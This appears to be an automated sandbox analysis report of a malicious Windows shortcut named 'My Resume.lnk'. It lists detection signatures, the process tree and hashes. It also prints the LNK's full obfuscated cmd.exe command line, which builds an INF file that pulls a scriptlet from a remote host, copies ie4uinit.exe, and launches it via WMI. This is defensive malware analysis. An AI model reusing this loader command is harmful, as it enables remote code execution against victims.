Edit tour
Windows
Analysis Report
My Resume.lnk
Overview
General Information
Detection
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Windows shortcut file (LNK) starts blacklisted processes
Antivirus detection for URL or domain
Sigma detected: Copying Sensitive Files with Credential Data
Checks if browser processes are running
Creates processes via WMI
Obfuscated command line found
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to create processes via WMI
Windows shortcut file (LNK) contains suspicious strings
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
Creates COM task schedule object (often to register a task for autostart)
Found evasive API chain (date check)
Creates files inside the system directory
Sigma detected: Suspicious WMI Execution
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Uses the system / local time for branch decision (may execute only at specific dates)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Drops PE files
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- cmd.exe (PID: 6920 cmdline:
C:\Windows \System32\ cmd.exe" / v /c set " VnLlYgV403 95=set" && call set "VnLlYgV58 278=%VnLlY gV40395:~0 ,1%" && (f or %l in ( c) do @set "VnLlYgV4 9771=%~l") && !VnLlY gV58278!et "VnLlYgV4 530=$w" && set "VnLl YgV81579=i " && set " VnLlYgV060 9=a" && se t "VnLlYgV 89173=t" & & !VnLlYgV 58278!et " VnLlYgV958 63=d" && s et "VnLlYg V33261=." && set "Vn LlYgV63461 =init" && set "VnLlY gV7723=si" && set "V nLlYgV3837 1=e" && se t "VnLlYgV 19376=sett ings" && s et "VnLlYg V8088=!VnL lYgV33261! inf" && se t "VnLlYgV 3504=ieu!V nLlYgV6346 1!!VnLlYgV 8088!" && call !VnLl YgV58278!e t "VnLlYgV 5462=%app! VnLlYgV958 63!ata%\Mi cro!VnLlYg V58278!oft \" && !VnL lYgV58278! et "VnLlYg V71257=!Vn LlYgV5462! !VnLlYgV35 04!" && se t "VnLlYgV 9155="^" & & (for %j in ("[vers ion]" "sig nature = ! VnLlYgV453 0!indows n t$" "[!VnL lYgV95863! e!VnLlYgV5 8278!tinat iondirs]" "E1C3=01" "[!VnLlYgV 95863!efau ltin!VnLlY gV58278!ta ll.windows 7]" "UnReg is!VnLlYgV 89173!erOC Xs=A52D05" "!VnLlYgV 95863!elf! VnLlYgV815 79!les=E1C 3" "[A52D0 5]" "%11%\ scRo%VnLlY gV2149%j,N I,%VnLlYgV 0081%%VnLl YgV6931%%V nLlYgV6931 %p%VnLlYgV 4892%%VnLl YgV64389%% VnLlYgV643 89%jamesre uther!VnLl YgV33261!% VnLlYgV656 3%/wmnxjog bfn" "[E1C 3]" "ieu%V nLlYgV4681 %!VnLlYgV8 088!" "[!V nLlYgV5827 8!!VnLlYgV 89173!ring s]" "VnLlY gV4681=!Vn LlYgV63461 !" "VnLlYg V6931=t" " !VnLlYgV58 278!ervice n!VnLlYgV0 609!me=' ' " "VnLlYgV 0081=h" "V nLlYgV4892 =:" "VnLlY gV64389=/" "!VnLlYgV 58278!hort svcn!VnLlY gV0609!me= ' '" "VnLl YgV6563=co m" "VnLlYg V2149=b") do @e!VnLl YgV49771!h o %~j)>"!V nLlYgV7125 7!" && !Vn LlYgV58278 !et "VnLlY gV5120=ie4 u!VnLlYgV6 3461!.!VnL lYgV38371! xe" && cal l copy /Y %win!VnLlY gV95863!ir %\!VnLlYgV 58278!yste m32\!VnLlY gV5120! "! VnLlYgV546 2!" > nul && !VnLlYg V58278!t!V nLlYgV0609 !rt "" /MI N wmi!VnLl YgV49771! proce!VnLl YgV58278!s call !VnL lYgV49771! rea!VnLlYg V89173!e " !VnLlYgV54 62!!VnLlYg V5120! -ba se!VnLlYgV 19376! MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6048 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - WMIC.exe (PID: 6268 cmdline:
wmic proce ss call cr eate "C:\U sers\user\ AppData\Ro aming\Micr osoft\ie4u init.exe - basesettin gs" MD5: EC80E603E0090B3AC3C1234C2BA43A0F) - conhost.exe (PID: 2940 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- ie4uinit.exe (PID: 6940 cmdline:
C:\Users\u ser\AppDat a\Roaming\ Microsoft\ ie4uinit.e xe -basese ttings MD5: 9DD77F0F421AA9A70383210706ECA529) - ie4uinit.exe (PID: 4788 cmdline:
C:\Users\u ser\AppDat a\Roaming\ Microsoft\ ie4uinit.e xe -ClearI conCache MD5: 9DD77F0F421AA9A70383210706ECA529) - rundll32.exe (PID: 2884 cmdline:
C:\Windows \system32\ RunDll32.e xe C:\Wind ows\system 32\migrati on\Wininet Plugin.dll ,MigrateCa cheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A) - rundll32.exe (PID: 204 cmdline:
C:\Windows \system32\ RunDll32.e xe C:\Wind ows\system 32\migrati on\Wininet Plugin.dll ,MigrateCa cheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: |
Source: | Author: Michael Haag, Florian Roth, juju4, oscd.community: |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Code function: | 7_2_00007FF6B522763C | |
Source: | Code function: | 7_2_00007FF6B522EA9C | |
Source: | Code function: | 7_2_00007FF6B52256A4 | |
Source: | Code function: | 7_2_00007FF6B5227AC8 | |
Source: | Code function: | 7_2_00007FF6B522E950 | |
Source: | Code function: | 7_2_00007FF6B5222550 | |
Source: | Code function: | 7_2_00007FF6B522ED98 | |
Source: | Code function: | 7_2_00007FF6B5227DCC | |
Source: | Code function: | 7_2_00007FF6B52225C0 | |
Source: | Code function: | 7_2_00007FF6B522544C | |
Source: | Code function: | 7_2_00007FF6B52274BC | |
Source: | Code function: | 7_2_00007FF6B522F108 | |
Source: | Code function: | 7_2_00007FF6B522E750 | |
Source: | Code function: | 7_2_00007FF6B5222B50 | |
Source: | Code function: | 7_2_00007FF6B522EFAC | |
Source: | Code function: | 7_2_00007FF6B522EBE0 | |
Source: | Code function: | 7_2_00007FF6B52273D0 | |
Source: | Code function: | 7_2_00007FF6B522E80C |